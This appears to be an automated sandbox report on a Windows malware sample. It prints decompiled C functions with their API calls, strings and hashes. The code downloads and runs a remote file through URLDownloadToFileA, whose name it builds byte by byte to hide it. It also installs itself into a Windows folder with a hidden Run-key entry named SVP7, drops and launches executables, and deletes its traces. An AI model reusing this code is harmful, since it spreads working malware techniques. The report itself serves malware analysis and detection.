													_t139 = DeleteFileA(_t180 - 0x334);
													__eflags = _t139;
												} while (_t139 == 0);
												_t141 = DeleteFileA(_t180 - 0x640);
												__eflags = _t141;
											} while (_t141 == 0);
											goto L17;
										}
										_t130 = E10004A35(_t180 - 0x14);
										__eflags = _t130;
										_pop(_t160);
										if(_t130 != 0) {
											_t142 = _t180 - 0x14;
											 *(_t180 + 8) = _t189;
											goto L14;
										}
										goto L15;
										L7:
										_t119 = PathFileExistsA(_t180 - 0x438);
										__eflags = _t119;
									}
								}
							}
						}
						L17:
						_push(1);
						_pop(0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return 0;
			}

0x100068f4
0x100068f9
0x1000690f
0x10006921
0x10006937
0x1000693d
0x10006946
0x1000694d
0x10006958
0x1000695a
0x1000695c
0x1000695d
0x10006968
0x1000697c
0x10006989
0x100069a3
0x100069b3
0x100069c3
0x100069d3
0x100069d8
0x100069f4
0x100069f9
0x00000000
0x10006a22
0x10006a23
0x10006a36
0x10006a47
0x10006a5a
0x10006a5c
0x10006a62
0x10006a65
0x10006a68
0x10006a6d
0x10006a72
0x10006a7b
0x10006a7e
0x10006a7f
0x10006a82
0x10006a87
0x10006a90
0x10006a93
0x10006a94
0x10006a98
0x10006a9d
0x10006aa1
0x10006aa6
0x10006aa9
0x10006aab
0x10006ab8
0x10006aca
0x10006adb
0x10006aec
0x10006af1
0x10006b00
0x10006b08
0x10006b0b
0x10006b0e
0x10006b14
0x10006b14
0x10006b1b
0x10006b21
0x10006b23
0x00000000
0x00000000
0x10006b25
0x10006b25
0x10006b32
0x10006b35
0x10006b36
0x10006b40
0x10006b41
0x10006b42
0x10006b45
0x10006b57
0x10006b6d
0x10006b73
0x10006b75
0x10006b7e
0x10006b7e
0x10006b88
0x10006b8d
0x10006b8f
0x10006b90
0x10006b93
0x10006b98
0x10006bb4
0x10006bb4
0x10006bb5
0x10006bba
0x10006bc0
0x10006b14
0x10006b14
0x10006b14
0x00000000
0x00000000
0x00000000
0x10006bc5
0x10006bd1
0x10006bd7
0x10006bdd
0x10006bec
0x10006bef
0x10006bf0
0x10006bf5
0x10006c02
0x10006c0f
0x10006c15
0x10006c15
0x10006c24
0x10006c2a
0x10006c2a
0x00000000
0x10006b14
0x10006ba1
0x10006ba6
0x10006ba8
0x10006ba9
0x10006bac
0x10006bb1
0x00000000
0x10006bb1
0x00000000
0x10006b14
0x10006b1b
0x10006b21
0x10006b21
0x10006b14
0x10006b0e
0x10006aab
0x10006c32
0x10006c32
0x10006c34
0x10006c34
0x100069f9
0x10006c3a
0x10006c43

APIs

__EH_prolog.LIBCMT ref: 100068F4
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000,00000000,?,?), ref: 1000690F
strcat.MSVCRT(?,10024458,?,?), ref: 10006921
PathFileExistsA.SHLWAPI(?,?,?), ref: 1000692F

Part of subcall function 10006784: CoInitialize.OLE32(00000000), ref: 10006793
Part of subcall function 10006784: CoCreateInstance.OLE32(1001D258,00000000,00000001,1001D248,?), ref: 10006841
Part of subcall function 10006784: MultiByteToWideChar.KERNEL32(00000000,00000000,C:\ProgramData\jy.lnk,000000FF,?,00000104), ref: 100068BA

memcpy.MSVCRT ref: 10006968
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 1000697C
PathAddBackslashA.SHLWAPI(?), ref: 10006989
wsprintfA.USER32 ref: 100069A3
wsprintfA.USER32 ref: 100069B3
wsprintfA.USER32 ref: 100069C3
strcat.MSVCRT(?,?), ref: 100069D3
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100069EE
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10006A11
CloseHandle.KERNEL32(00000000), ref: 10006A23
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10006A36
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000), ref: 10006A47
PathFileExistsA.SHLWAPI(?), ref: 10006A54
#537.MFC42(10027110), ref: 10006A6D
#537.MFC42(?,?,10027110), ref: 10006A82
#537.MFC42(?,?,?,?,10027110), ref: 10006A98
DeleteFileA.KERNEL32(?,?,10027110), ref: 10006AB8
strcat.MSVCRT(?,\1200.exe,?,10027110), ref: 10006ACA
strcat.MSVCRT(?,\d.rar,?,\1200.exe,?,10027110), ref: 10006ADB
strcat.MSVCRT(?,\run.exe,?,\d.rar,?,\1200.exe,?,10027110), ref: 10006AEC
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 10006B00
PathFileExistsA.SHLWAPI(?,?,?,?,?,?,?,?,10027110), ref: 10006B1B
Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,10027110), ref: 10006B45
strcat.MSVCRT(?,\SVIP7.exe,?,?,?,?,?,?,?,10027110), ref: 10006B57
CopyFileA.KERNEL32(?,?,00000000), ref: 10006B6D
PathRemoveFileSpecA.SHLWAPI(?,?,?,?,?,?,?,?,10027110), ref: 10006B7E
#537.MFC42(?,?,?,?,?,?,?,?,?,10027110), ref: 10006BB5
strcat.MSVCRT(?,\1234,?,?,?,?,?,?,?,10027110), ref: 10006BD1
DeleteFileA.KERNEL32(C:\ProgramData\jy.lnk,?,?,?,?,?,?,?,10027110), ref: 10006BDD
#537.MFC42(?,?,?,?,?,?,?,?,?,10027110), ref: 10006BF0
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,10027110), ref: 10006C02
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,10027110), ref: 10006C0F
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,10027110), ref: 10006C24

Strings

\1234, xrefs: 10006BCB
run.exe, xrefs: 10006B25
\d.rar, xrefs: 10006AD5
\run.exe, xrefs: 10006AE6
\SVIP7.exe, xrefs: 10006B51
C:\ProgramData\jy.lnk, xrefs: 10006BD8
\1200.exe, xrefs: 10006AC4
1200.exe, xrefs: 10006B2A

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Path$strcat$#537Delete$ExistsFolderSpecialwsprintf$Create$BackslashByteCharCloseCopyExecuteH_prologHandleInitializeInstanceModuleMultiNameRemoveShellSleepSpecWideWritememcpy
String ID: 1200.exe$C:\ProgramData\jy.lnk$\1200.exe$\1234$\SVIP7.exe$\d.rar$\run.exe$run.exe
API String ID: 558230636-248971699
Opcode ID: c9faf1b7fbba479759ccbc6062f16b5de7c01974bb104779d40b1db75f792a43
Instruction ID: 87d2692089fe6358aa8efa37575101229ca6eb19a670ad7e2f6981e86269d1b7
Opcode Fuzzy Hash: c9faf1b7fbba479759ccbc6062f16b5de7c01974bb104779d40b1db75f792a43
Instruction Fuzzy Hash: 219110B2900229ABEB10EBA4CC89EDE77BCEB08355F504596F509E6141DB34EB858F61

Uniqueness

Uniqueness Score: -1.00%

Function 10005745, Relevance: 70.1, APIs: 10, Strings: 30, Instructions: 129
stringlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10005745(void* __edi, char* _a4) {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char* _v40;
				void _v551;
				char _v552;
				char _v812;
				int _t50;
				void* _t52;
				_Unknown_base(*)()* _t67;
				void* _t73;
				signed int _t78;
				int _t88;
				char* _t90;

				_t50 = strlen(_a4);
				if(_t50 == 0) {
					L7:
					return 0;
				}
				_t2 = _t50 + 1; // 0x1
				_t88 = _t2;
				_t52 = malloc(_t88);
				_v40 = _t52;
				memcpy(_t52, _a4, _t88);
				_t90 =  &((strrchr(_v40, 0x2f))[1]);
				if(_t90 == 0) {
					goto L7;
				}
				_t78 = 0x7f;
				_v552 = 0;
				memset( &_v551, 0, _t78 << 2);
				asm("stosw");
				asm("stosb");
				 *0x100273bc(0,  &_v812, 0x2e, 0, __edi);
				strcat( &_v812, "\\%s");
				wsprintfA( &_v552,  &_v812, _t90);
				_v16 = 0x75;
				_v15 = 0x72;
				_v14 = 0x6c;
				_v13 = 0x6d;
				_v12 = 0x6f;
				_v11 = 0x6e;
				_v10 = 0x2e;
				_v9 = 0x64;
				_v8 = 0x6c;
				_v7 = 0x6c;
				_v6 = 0;
				_v36 = 0x55;
				_v35 = 0x52;
				_v34 = 0x4c;
				_v33 = 0x44;
				_v32 = 0x6f;
				_v31 = 0x77;
				_v30 = 0x6e;
				_v29 = 0x6c;
				_v28 = 0x6f;
				_v27 = 0x61;
				_v26 = 0x64;
				_v25 = 0x54;
				_v24 = 0x6f;
				_v23 = 0x46;
				_v22 = 0x69;
				_v21 = 0x6c;
				_v20 = 0x65;
				_v19 = 0x41;
				_v18 = 0;
				_t67 = GetProcAddress(LoadLibraryA( &_v16),  &_v36);
				_push(0);
				_push(0);
				_push( &_v552);
				_push(_v40);
				_push(0);
				if( *_t67() != 0 || E1000D69B( &_v552) == 0) {
					goto L7;
				} else {
					if(ShellExecuteA(0, 0,  &_v552, 0, 0, 5) <= 0x20) {
						E100055B3( &_v552, 5);
					}
					_t73 = 1;
					return _t73;
				}
			}

0x10005753
0x1000575e
0x100058c1
0x00000000
0x100058c1
0x10005764
0x10005764
0x10005768
0x1000576f
0x10005776
0x1000578c
0x1000578d
0x00000000
0x00000000
0x10005796
0x1000579f
0x100057a5
0x100057a7
0x100057a9
0x100057b5
0x100057c7
0x100057db
0x100057e7
0x100057eb
0x100057f4
0x100057f8
0x100057fc
0x10005800
0x10005804
0x10005808
0x1000580c
0x10005810
0x10005814
0x10005817
0x1000581b
0x1000581f
0x10005823
0x10005827
0x1000582b
0x1000582f
0x10005833
0x10005837
0x1000583b
0x1000583f
0x10005843
0x10005847
0x1000584b
0x1000584f
0x10005853
0x10005857
0x1000585b
0x1000585f
0x10005869
0x1000586f
0x10005876
0x10005877
0x10005878
0x1000587b
0x10005881
0x00000000
0x10005894
0x100058aa
0x100058b5
0x100058bb
0x100058be
0x00000000
0x100058be

APIs

strlen.MSVCRT ref: 10005753
malloc.MSVCRT ref: 10005768
memcpy.MSVCRT ref: 10005776
strrchr.MSVCRT ref: 10005781
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000,00000104), ref: 100057B5
strcat.MSVCRT(?,\%s), ref: 100057C7
wsprintfA.USER32 ref: 100057DB
LoadLibraryA.KERNEL32(00000075,?), ref: 10005862
GetProcAddress.KERNEL32(00000000), ref: 10005869

Part of subcall function 1000D69B: GetFileAttributesA.KERNEL32(?,?,1000588F,?), ref: 1000D6A1
Part of subcall function 1000D69B: GetLastError.KERNEL32(?,1000588F,?), ref: 1000D6AC

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 100058A1

Part of subcall function 100055B3: memset.MSVCRT ref: 100055D2
Part of subcall function 100055B3: strrchr.MSVCRT ref: 100055DC
Part of subcall function 100055B3: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 100055FD
Part of subcall function 100055B3: RegQueryValueA.ADVAPI32(?,00000000,?,100058BA), ref: 1000561C
Part of subcall function 100055B3: RegCloseKey.ADVAPI32(?), ref: 10005627
Part of subcall function 100055B3: memset.MSVCRT ref: 10005637
Part of subcall function 100055B3: wsprintfA.USER32 ref: 1000564F
Part of subcall function 100055B3: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 1000566F

Strings

D, xrefs: 10005823
T, xrefs: 10005843
\%s, xrefs: 100057C1
U, xrefs: 10005817
r, xrefs: 100057EB
d, xrefs: 10005808
l, xrefs: 10005810
l, xrefs: 10005853
i, xrefs: 1000584F
o, xrefs: 100057FC
L, xrefs: 1000581F
w, xrefs: 1000582B
a, xrefs: 1000583B
n, xrefs: 10005800
o, xrefs: 10005837
n, xrefs: 1000582F
u, xrefs: 100057E7
urlmon.dll, xrefs: 100057F0
F, xrefs: 1000584B
e, xrefs: 10005857
l, xrefs: 100057F4
d, xrefs: 1000583F
o, xrefs: 10005827
o, xrefs: 10005847
m, xrefs: 100057F8
., xrefs: 10005804
l, xrefs: 1000580C
l, xrefs: 10005833
R, xrefs: 1000581B
A, xrefs: 1000585B

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Openmemsetstrrchrwsprintf$AddressAttributesCloseErrorExecuteFileFolderLastLibraryLoadPathProcQueryShellSpecialValuemallocmemcpystrcatstrlen
String ID: .$A$D$F$L$R$T$U$\%s$a$d$d$e$i$l$l$l$l$l$m$n$n$o$o$o$o$r$u$urlmon.dll$w
API String ID: 725883188-1054757811
Opcode ID: 91e7efaafc667cd0f335d6b773aee5a2e4f85b4a32736bda7c0e869cd323230a
Instruction ID: 0bd4b92ea842baf5933a4e23814f758a64a148836656ee0042cd0fd01be41f10
Opcode Fuzzy Hash: 91e7efaafc667cd0f335d6b773aee5a2e4f85b4a32736bda7c0e869cd323230a
Instruction Fuzzy Hash: 8D519F218082D9EEFB02D7E8CC8CBDFBFB99F15744F044095E644A6182D7BA5B588B71

Uniqueness

Uniqueness Score: -1.00%

Function 00402D10, Relevance: 66.6, APIs: 6, Strings: 32, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402D10(void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				signed int _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				_Unknown_base(*)()* _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t68;
				_Unknown_base(*)()* _t77;
				void* _t80;
				void* _t84;
				void* _t85;
				intOrPtr* _t99;
				intOrPtr _t101;

				_t102 =  &_v68;
				_t68 =  *0x44f5d0; // 0x8e7de579
				_v4 = _t68 ^  &_v68;
				_t101 = _a4;
				_v59 = 0x45;
				_v56 = 0x45;
				_v12 = 0x73;
				_v11 = 0x73;
				_v60 = 0x4b;
				_v58 = 0x52;
				_v57 = 0x4e;
				_v55 = 0x4c;
				_v54 = 0x33;
				_v53 = 0x32;
				_v52 = 0x2e;
				_v51 = 0x64;
				_v50 = 0x6c;
				_v49 = 0x6c;
				_v48 = 0;
				_v20 = 0x47;
				_v19 = 0x65;
				_v18 = 0x74;
				_v17 = 0x50;
				_v16 = 0x72;
				_v15 = 0x6f;
				_v14 = 0x63;
				_v13 = 0x65;
				_v10 = 0x48;
				_v9 = 0x65;
				_v8 = 0x61;
				_v7 = 0x70;
				_v6 = 0;
				_v68 = GetProcAddress(LoadLibraryA( &_v60),  &_v20);
				_v32 = 0x48;
				_v31 = 0x65;
				_v30 = 0x61;
				_v29 = 0x70;
				_v28 = 0x52;
				_v27 = 0x65;
				_v26 = 0x41;
				_v25 = 0x6c;
				_v24 = 0x6c;
				_v23 = 0x6f;
				_v22 = 0x63;
				_v21 = 0;
				_t77 = GetProcAddress(LoadLibraryA( &_v60),  &_v32);
				_t48 =  &_v44; // 0x2e
				_v64 = _t77;
				_v44 = 0x48;
				_v43 = 0x65;
				_v42 = 0x61;
				_v41 = 0x70;
				_v40 = 0x41;
				_v39 = 0x6c;
				_v38 = 0x6c;
				_v37 = 0x6f;
				_v36 = 0x63;
				_v35 = 0;
				_t99 = GetProcAddress(LoadLibraryA( &_v60), _t48);
				if(_t101 == 0) {
					_t80 = _v68(0, _a8);
					return E0042569C( *_t99(), 0x65, _v16 ^ _t102,  &_v60, GetProcAddress, _t99, _t80);
				} else {
					_t84 = _v68(0, _t101, _a8);
					_t85 = _v64();
					_t64 =  &_v20; // 0x52
					return E0042569C(_t85, 0x65,  *_t64 ^ _t102,  &_v60, GetProcAddress, _t99, _t84);
				}
			}

APIs

LoadLibraryA.KERNEL32 ref: 00402DC1
GetProcAddress.KERNEL32(00000000), ref: 00402DCA
LoadLibraryA.KERNEL32(?,?), ref: 00402E14
GetProcAddress.KERNEL32(00000000), ref: 00402E17
LoadLibraryA.KERNEL32(?,.23L), ref: 00402E58
GetProcAddress.KERNEL32(00000000), ref: 00402E5B

Strings

K, xrefs: 00402D4C
3, xrefs: 00402D60
o, xrefs: 00402E49
p, xrefs: 00402E35
a, xrefs: 00402DB2
p, xrefs: 00402DE8
l, xrefs: 00402E00
H, xrefs: 00402DDA
l, xrefs: 00402DFB
A, xrefs: 00402E3A
c, xrefs: 00402E0A
N, xrefs: 00402D56
o, xrefs: 00402E05
l, xrefs: 00402E44
a, xrefs: 00402DE3
2, xrefs: 00402D65
H, xrefs: 00402DA9
Rpa, xrefs: 00402E78
o, xrefs: 00402D9B
r, xrefs: 00402D96
R, xrefs: 00402D51
G, xrefs: 00402D83
.23L, xrefs: 00402E19, 00402E1D
l, xrefs: 00402E3F
a, xrefs: 00402E30
H, xrefs: 00402E27
t, xrefs: 00402D8C
L, xrefs: 00402D5B
P, xrefs: 00402D91
c, xrefs: 00402DA0
c, xrefs: 00402E4E
p, xrefs: 00402DB7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .23L$2$3$A$G$H$H$H$K$L$N$P$R$Rpa$a$a$a$c$c$c$l$l$l$l$o$o$o$p$p$p$r$t
API String ID: 2574300362-1209862703
Opcode ID: bd2a57f1d95169d0685393ee62aff27c5d0bd33e93c9856fa2f4463bdb7e271c
Instruction ID: f0d58c420db290d49952ccd9179236ad68bce969cef9e32a75ca4a007b97abd8
Opcode Fuzzy Hash: bd2a57f1d95169d0685393ee62aff27c5d0bd33e93c9856fa2f4463bdb7e271c
Instruction Fuzzy Hash: CC51E46150C3C0DEE352D7688448B5FFFE55BA6648F88099DF2C84B282C6BA9518C77B

Uniqueness

Uniqueness Score: -1.00%

Function 1000B69F, Relevance: 63.2, APIs: 29, Strings: 7, Instructions: 200
stringregistryfileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E1000B69F() {
				void* _v8;
				int _v12;
				long _v16;
				char _v276;
				char _v535;
				char _v536;
				char _v796;
				void _v1006;
				char _v1052;
				void* __edi;
				void* _t46;
				int _t54;
				char* _t64;
				void* _t99;
				signed int _t107;
				signed int _t115;
				void* _t119;
				void* _t120;
				void* _t129;
				void* _t130;
				void* _t131;

				_t107 = 0x40;
				_t119 =  &_v535;
				_v536 = 0;
				memset(_t119, 0, _t107 << 2);
				_t131 = _t130 + 0xc;
				_t120 = _t119 + _t107;
				asm("stosw");
				asm("stosb");
				GetModuleFileNameA(0,  &_v536, 0x104);
				_t46 = OpenProcess(0x1f0fff, 0, GetCurrentProcessId());
				_v16 = 0x104;
				 *0x10027270(_t46, 0,  &_v536,  &_v16);
				PathStripPathA( &_v536);
				 *0x100273bc(0,  &_v276, 0x1c, 0);
				 *0x100273bc(0,  &_v796, 0x1c, 0);
				_t54 = PathFileExistsA( &_v276);
				_push( &_v276);
				if(_t54 == 0) {
					PathStripToRootA();
					strcat( &_v276, "Windows\\");
					strcat( &_v276,  &_v536);
					_t131 = _t131 + 0x10;
					PathStripToRootA( &_v796);
					_push("Windows\\");
					_t64 =  &_v796;
				} else {
					PathAddBackslashA();
					PathAddBackslashA( &_v796);
					_push( &_v536);
					_t64 =  &_v276;
				}
				strcat(_t64, ??);
				if(PathFileExistsA( &_v276) == 0) {
					if( *0x100275a8 == 1) {
						_push(0);
						_t99 = E1000CCF9(0, 0, E10005745(_t120, 0x10027174), 0, 0, 0);
						_t131 = _t131 + 0x1c;
						_t129 = _t99;
						WaitForSingleObject(_t129, 0xffffffff);
						CloseHandle(_t129);
					}
					strcat( &_v796, "nw_elf.dll");
					CopyFileA("nw_elf.dll",  &_v796, 0);
					if(CopyFileA( &_v536,  &_v276, 0) != 0) {
						if( *0x1002714c == 1) {
							E1000343E();
						}
						SetFileAttributesA( &_v536,  *0x10027406 & 0x0000ffff);
						SetFileAttributesA( &_v276,  *0x10027406 & 0x0000ffff);
						_t115 = 0xb;
						memcpy( &_v1052, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t115 << 2);
						asm("movsw");
						_push(0x34);
						memset( &_v1006, 0, 0 << 2);
						asm("stosw");
						_v12 = 2;
						RegCreateKeyExA(0x80000001,  &_v1052, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
						RegSetValueExA(_v8, "SVP7", 0, 1,  &_v276, lstrlenA( &_v276));
						ShellExecuteA(0, 0,  &_v276, 0, 0, 0);
						RegCloseKey(_v8);
						ExitProcess(0);
					}
				}
				if( *0x1002759c == 1) {
					E100038D7();
				}
				E1000B254();
				return 0;
			}

0x1000b6af
0x1000b6b2
0x1000b6b8
0x1000b6c3
0x1000b6c3
0x1000b6c3
0x1000b6c5
0x1000b6c7
0x1000b6d1
0x1000b6e4
0x1000b6ed
0x1000b6fa
0x1000b707
0x1000b718
0x1000b729
0x1000b736
0x1000b744
0x1000b745
0x1000b76f
0x1000b77d
0x1000b790
0x1000b795
0x1000b79f
0x1000b7a1
0x1000b7a6
0x1000b747
0x1000b747
0x1000b754
0x1000b760
0x1000b761
0x1000b761
0x1000b7ad
0x1000b7c3
0x1000b7d0
0x1000b7d2
0x1000b7e3
0x1000b7e8
0x1000b7eb
0x1000b7f0
0x1000b7f7
0x1000b7f7
0x1000b809
0x1000b81d
0x1000b83a
0x1000b847
0x1000b849
0x1000b849
0x1000b85d
0x1000b872
0x1000b87f
0x1000b886
0x1000b888
0x1000b88a
0x1000b895
0x1000b897
0x1000b89c
0x1000b8bd
0x1000b8e3
0x1000b8f5
0x1000b8fe
0x1000b905
0x1000b905
0x1000b83a
0x1000b912
0x1000b914
0x1000b914
0x1000b919
0x1000b924

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 1000B6D1
GetCurrentProcessId.KERNEL32 ref: 1000B6D7
OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000B6E4
QueryFullProcessImageNameA.KERNEL32(00000000,00000000,?,?), ref: 1000B6FA
PathStripPathA.SHLWAPI(?), ref: 1000B707
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 1000B718
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 1000B729
PathFileExistsA.SHLWAPI(?), ref: 1000B736
PathAddBackslashA.SHLWAPI(?), ref: 1000B747
PathAddBackslashA.SHLWAPI(?), ref: 1000B754
PathStripToRootA.SHLWAPI(?), ref: 1000B76F
strcat.MSVCRT(?,Windows\), ref: 1000B77D
strcat.MSVCRT(?,?,?,Windows\), ref: 1000B790
PathStripToRootA.SHLWAPI(?), ref: 1000B79F
strcat.MSVCRT(?,Windows\), ref: 1000B7AD
PathFileExistsA.SHLWAPI(?), ref: 1000B7BB
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,00000000), ref: 1000B7F0
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1000B7F7
strcat.MSVCRT(?,nw_elf.dll), ref: 1000B809
CopyFileA.KERNEL32(nw_elf.dll,?,00000000), ref: 1000B81D
CopyFileA.KERNEL32(?,?,00000000), ref: 1000B832
SetFileAttributesA.KERNEL32(?,00000000), ref: 1000B85D
SetFileAttributesA.KERNEL32(?,00000000), ref: 1000B872
RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,1000BE78,?), ref: 1000B8BD
lstrlenA.KERNEL32(?), ref: 1000B8CA
RegSetValueExA.ADVAPI32(1000BE78,SVP7,00000000,00000001,?,00000000), ref: 1000B8E3
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 1000B8F5
RegCloseKey.ADVAPI32(1000BE78), ref: 1000B8FE
ExitProcess.KERNEL32 ref: 1000B905

Strings

SVP7, xrefs: 1000B8DB
Windows\, xrefs: 1000B777
Windows\, xrefs: 1000B7A1
nw_elf.dll, xrefs: 1000B818
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000B87A
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000B6A8
nw_elf.dll, xrefs: 1000B803

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Path$File$Processstrcat$Strip$AttributesBackslashCloseCopyExistsFolderNameRootSpecial$CreateCurrentExecuteExitFullHandleImageModuleObjectOpenQueryShellSingleValueWaitlstrlen
String ID: SVP7$Software\Microsoft\Windows\CurrentVersion\Run$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij$Windows\$Windows\$nw_elf.dll$nw_elf.dll
API String ID: 711671097-3400231182
Opcode ID: 9f80d403be04d1f668f6825a8248f9e7be7806d74d5cc5f0f2f111509a0eefd7
Instruction ID: a73016f356ca4594b341a7fbcb89441362ec75b379b148d58ea091891c5c7f93
Opcode Fuzzy Hash: 9f80d403be04d1f668f6825a8248f9e7be7806d74d5cc5f0f2f111509a0eefd7
Instruction Fuzzy Hash: D161DDB280012DAFEB25DBA0CCC9EEA777CFB08355F140496F619A2051DB749E898F61

Uniqueness

Uniqueness Score: -1.00%

Function 10004C41, Relevance: 57.9, APIs: 20, Strings: 13, Instructions: 144
registrystringfileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E10004C41() {
				void* _v8;
				void* _v12;
				void _v56;
				intOrPtr _v60;
				char _v64;
				char _v100;
				char _v360;
				struct _OSVERSIONINFOA _v508;
				char _t64;
				intOrPtr _t65;
				void* _t69;
				signed int _t81;
				signed int _t84;
				void* _t97;
				void* _t101;
				void* _t104;

				_push(_t97);
				if( *0x10027408 != 2) {
					_t81 = 8;
					memcpy( &_v100, "SYSTEM\\CurrentControlSet\\Services", _t81 << 2);
					_v12 = 0;
					_v8 = 0;
					asm("movsw");
					RegOpenKeyExA(0x80000001,  &_v100, 0, 0xf003f,  &_v8);
					E1000D502(0x80000001,  &_v100, "Vwxyab Defghijk", 0, 0, 0, 2);
					_t101 = _t101 + 0x28;
					RegDeleteValueA(_v8, "Group");
					RegDeleteValueA(_v8, "Remark");
					RegDeleteValueA(_v8, "InstallTime");
					RegCloseKey(_v8);
					RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v12);
					RegDeleteValueA(_v12, "SVP7");
					RegCloseKey(_v12);
				} else {
					E100032B8(_t97, "Vwxyab Defghijk");
				}
				 *0x100273bc(0,  &_v360, 0x1c, 0);
				if(PathFileExistsA( &_v360) == 0) {
					PathStripToRootA( &_v360);
					strcat( &_v360, "Windows\\");
					strcat( &_v360, "Fatal");
					_push(".key");
				} else {
					strcat( &_v360, "\\");
					strcat( &_v360, "Fatal");
					_push(".key");
				}
				strcat( &_v360, ??);
				DeleteFileA( &_v360);
				_t64 = "cmd.exe"; // 0x2e646d63
				_v64 = _t64;
				_t65 =  *0x100240d8; // 0x657865
				_v60 = _t65;
				_t84 = 0xa;
				memset( &_v56, 0, _t84 << 2);
				_t104 = _t101 + 0x24;
				asm("stosw");
				while(1) {
					_t69 = E10004A35( &_v64);
					_pop(_t86);
					if(_t69 == 0) {
						break;
					}
					_v12 = _t104;
					_push( &_v64);
					L10015818();
					E1000490A();
				}
				E10004AFD();
				_v508.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v508);
				if(_v508.dwPlatformId == 2 && _v508.dwMajorVersion >= 6) {
					 *0x100275b0 = 1;
				}
				ExitProcess(0);
			}

0x10004c52
